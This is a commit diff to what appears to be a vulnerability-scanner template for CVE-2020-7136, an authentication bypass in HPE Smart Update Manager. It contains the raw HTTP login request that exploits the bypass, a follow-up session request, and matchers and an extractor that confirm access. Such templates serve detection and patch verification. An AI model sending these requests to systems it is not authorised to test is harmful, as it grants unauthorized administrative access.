Update CVE-2020-7136.yaml

patch-1
Prince Chaddha 2022-01-11 13:43:30 +05:30 committed by GitHub
parent 351dc3e460
commit 6ea0a7f492
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 17 additions and 1 deletions

View File

@ -5,7 +5,6 @@ info:
author: gy741
severity: critical
description: A security vulnerability in HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
tags: cve,cve2020,hp,auth-bypass
reference:
- https://www.tenable.com/security/research/tra-2020-02
- https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
@ -15,6 +14,7 @@ info:
cvss-score: 9.80
cve-id: CVE-2020-7136
cwe-id: CWE-288
tags: cve,cve2020,hp,auth-bypass,hpe
requests:
- raw:
@ -26,8 +26,24 @@ requests:
{"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}
- |
GET /session/{{sessionid}}/node/index HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "hmessage"
- "Command completed successfully."
- "node_name"
condition: and
extractors:
- type: regex
name: sessionid
group: 1
internal: true
part: body
regex:
- '"sessionId":"([a-z0-9.]+)"'